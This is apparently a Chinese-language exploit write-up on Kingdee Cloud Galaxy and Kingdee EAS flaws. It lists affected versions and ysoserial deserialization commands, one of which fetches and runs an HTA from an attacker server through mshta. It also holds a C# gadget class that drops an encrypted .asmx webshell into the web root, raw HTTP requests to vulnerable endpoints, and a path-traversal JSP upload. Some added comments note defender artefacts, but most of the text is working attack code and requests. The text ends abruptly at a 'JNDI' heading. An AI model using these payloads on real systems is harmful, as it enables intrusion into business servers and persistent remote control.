金蝶系列漏洞利用

很详细的文章,比较靠谱
1.漏洞版本
金蝶云星空 < 6.2.1012.4
7.0.352.16 < 金蝶云星空 < 7.7.0.202111
8.0.0.202205 < 金蝶云星空 < 8.1.0.20221110
2.漏洞利用
2.1 文件上传
找到网站路径
http://IP/K3cloud/Kingdee.K3.SCM.App.CP.ServicePlugIn.WebAPI.GetCustomBussinessService.GetYZMByMobileNo,Kingdee.K3.SCM.App.CP.ServicePlugIn.common.kdsvc
建立payload.hta
<HTML> 
<!-- Test HTA launched through the mshta one-liner that follows this listing.
     It only writes a fixed marker file with a fixed string under the Kingdee
     web root; the file is the on-disk artefact that shows the HTA ran. -->
<meta http-equiv="Contenti-Type" content="text/html; charset=utf-8"> <!-- NOTE: "Contenti-Type" is a typo for Content-Type; the browser ignores it, so it has no effect here -->
<HEAD> 
<script language="VBScript">
' FileSystemObject write of the marker file: fixed path, fixed content.
set fso=createobject("scripting.filesystemobject")
set file=fso.createtextfile("D:\Kingdee\K3Cloud\WebSite\40261312.txt")
s="asdf123123"
file.write s
file.close
</script>
<!-- NOTE: <body> is nested inside <HEAD> in the original; mshta tolerates it. -->
<body>
demo
</body>
</HEAD> 
</HTML>
最后
ysoserial.exe -f BinaryFormatter -g ResourceSet -o base64 -c "mshta http://vps地址/payload.hta"
内存马
using System;
using System.IO;

/// <summary>
/// Payload class: all of its work is in the constructor, so it executes as soon as the
/// type is instantiated -- presumably as the class compiled into the
/// ActivitySurrogateSelectorFromFile gadget by the ysoserial command after this listing.
/// Despite the "内存马" (in-memory shell) heading, this does touch disk: it decodes an
/// embedded base64 .asmx web service and writes it into the application root, then
/// echoes the written path back in the HTTP response.
/// Defender notes: the durable artefact is a newly created service1.asmx in the site
/// root; a response body of the form "<path>write success" is the traffic-level marker.
/// </summary>
class E
{
    public E()
    {
        // Runs inside the ASP.NET request that delivered the serialized payload.
        System.Web.HttpContext context = System.Web.HttpContext.Current;
        // Discard any pending error and buffered output so only the text below is returned.
        context.Server.ClearError();
        context.Response.Clear();
        try
        {
            // BaseDirectory of the current AppDomain; for an ASP.NET site this is the
            // web root, so the dropped handler is served by the site itself.
            string baseDirectory = AppDomain.CurrentDomain.BaseDirectory;
            string filePath = Path.Combine(baseDirectory, "service1.asmx");
            // Base64 of the .asmx source: it decodes to a "<%@ WebService ..." page
            // directive followed by the C# handler. The literal is line-wrapped in this
            // listing; it is a single string in the original.
            string content = "PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkMjIiBDbGFzcz0iV2ViU2VydmljZTEiICU+CnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSA6IFN5c3RlbS5XZWIuU2VydmljZXMuV2ViU2VydmljZQp7CgogICAgICAgIFtTeXN0ZW0uV2ViLlNlcnZpY2VzLldlYk1ldGhvZChFbmFibGVTZXNzaW9uID0gdHJ1ZSldCiAgICAgICAgcHVibGljIHN0cmluZyBwYXNzMTIzNChzdHJpbmcgcGFzczEyMzQpCiAgICAgICAgewoJCQlTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyIHN0cmluZ0J1aWxkZXIgPSBuZXcgU3lzdGVtLlRleHQuU3RyaW5nQnVpbGRlcigpOwogICAgICAgICAgICB0cnkgeyBzdHJpbmcga2V5ID0gIjNjNmUwYjhhOWMxNTIyNGEiOyBzdHJpbmcgcGFzczEyMzRfcGFzcyA9ICJwYXNzMTIzNCI7IHN0cmluZyBtZDUgPSBTeXN0ZW0uQml0Q29udmVydGVyLlRvU3RyaW5nKG5ldyBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5Lk1ENUNyeXB0b1NlcnZpY2VQcm92aWRlcigpLkNvbXB1dGVIYXNoKFN5c3RlbS5UZXh0LkVuY29kaW5nLkRlZmF1bHQuR2V0Qnl0ZXMocGFzczEyMzRfcGFzcyArIGtleSkpKS5SZXBsYWNlKCItIiwgIiIpOyBieXRlW10gZGF0YSA9IFN5c3RlbS5Db252ZXJ0LkZyb21CYXNlNjRTdHJpbmcoU3lzdGVtLldlYi5IdHRwVXRpbGl0eS5VcmxEZWNvZGUocGFzczEyMzQpKTsgZGF0YSA9IG5ldyBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlJpam5kYWVsTWFuYWdlZCgpLkNyZWF0ZURlY3J5cHRvcihTeXN0ZW0uVGV4dC5FbmNvZGluZy5EZWZhdWx0LkdldEJ5dGVzKGtleSksIFN5c3RlbS5UZXh0LkVuY29kaW5nLkRlZmF1bHQuR2V0Qnl0ZXMoa2V5KSkuVHJhbnNmb3JtRmluYWxCbG9jayhkYXRhLCAwLCBkYXRhLkxlbmd0aCk7IGlmIChDb250ZXh0LlNlc3Npb25bInBheWxvYWQiXSA9PSBudWxsKSB7IENvbnRleHQuU2Vzc2lvblsicGF5bG9hZCJdID0gKFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5KXR5cGVvZihTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSkuR2V0TWV0aG9kKCJMb2FkIiwgbmV3IFN5c3RlbS5UeXBlW10geyB0eXBlb2YoYnl0ZVtdKSB9KS5JbnZva2UobnVsbCwgbmV3IG9iamVjdFtdIHsgZGF0YSB9KTsgOyB9IGVsc2UgeyBvYmplY3QgbyA9ICgoU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkpQ29udGV4dC5TZXNzaW9uWyJwYXlsb2FkIl0pLkNyZWF0ZUluc3RhbmNlKCJMWSIpOyBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtIG91dFN0cmVhbSA9IG5ldyBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCk7IG8uRXF1YWxzKENvbnRleHQpOyBvLkVxdWFscyhvdXRTdHJlYW0pOyBvLkVxdWFscyhkYXRhKTsgby5Ub1N0cmluZygpOyBieXRlW10gciA9IG91dFN0cmVhbS5Ub0FycmF5KCk7IHN0cmluZ0J1aWxkZXIuQXBwZW5kKG1kNS5TdWJzdHJpbmcoMCwgMTYpKTsgc3RyaW5nQnVpbGRlci5BcHBlbmQoU3lzdGVtLkNvbnZlcnQuVG9CYXNlNjRTdHJpbmcobm
V3IFN5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUmlqbmRhZWxNYW5hZ2VkKCkuQ3JlYXRlRW5jcnlwdG9yKFN5c3RlbS5UZXh0LkVuY29kaW5nLkRlZmF1bHQuR2V0Qnl0ZXMoa2V5KSwgU3lzdGVtLlRleHQuRW5jb2RpbmcuRGVmYXVsdC5HZXRCeXRlcyhrZXkpKS5UcmFuc2Zvcm1GaW5hbEJsb2NrKHIsIDAsIHIuTGVuZ3RoKSkpOyBzdHJpbmdCdWlsZGVyLkFwcGVuZChtZDUuU3Vic3RyaW5nKDE2KSk7IH0gfSBjYXRjaCAoU3lzdGVtLkV4Y2VwdGlvbikgeyB9CgkJCXJldHVybiBzdHJpbmdCdWlsZGVyLlRvU3RyaW5nKCk7CgkJfQogICAgCn0K";
            byte[] decodedBytes = Convert.FromBase64String(content);
            // The write itself: a new file appearing in the web root is what file-integrity
            // monitoring on the site directory should catch.
            File.WriteAllBytes(filePath, decodedBytes);
            context.Response.Write(filePath+"write success");
        }
        // Every failure (e.g. no write permission on the web root) is swallowed silently;
        // the only success signal is the "write success" marker in the response.
        catch (System.Exception) { }
        context.Response.Flush();
        // End() terminates the request here, so the normal handler output never follows.
        context.Response.End();
    }
}
生成反序列化数据
ysoserial.exe -f BinaryFormatter -g ActivitySurrogateSelectorFromFile -c "ExploitClass.cs;System.Windows.Forms.dll;System.dll;System.Web.dll"
利用点
POST /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DynamicForm.DynamicFormService.CloseForm.common.kdsvc HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 11.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5520.225 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: ASP.NET_SessionId=41t5f11hkfhru5h5bc5wox3p; Theme=standard; kdservice-sessionid=13390743-9d17-4d4f-a6a9-a58582831195
cmd: whoami
Content-Type: text/json
Content-Length: 15907

{"ap0":"xxx","format":"3"}
还有一个接口
POST /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc
POST /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DynamicForm.DynamicFormService.CloseForm.common.kdsvc HTTP/1.1
除了反序列化之外，还有这个：
文件上传
POST /easportal/buffalo/%2e%2e/cm/myUploadFile.do HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySq4lDnabv8CwHfvx
Content-Length: 205

------WebKitFormBoundarySq4lDnabv8CwHfvx
Content-Disposition: form-data; name="myFile"; filename="test.jsp"
Content-Type: text/html

<%out.println("test");%>
------WebKitFormBoundarySq4lDnabv8CwHfvx--
上传后文件的最终路径是
http://127.0.0.1/easportal/buffalo/../test.jsp
JNDI

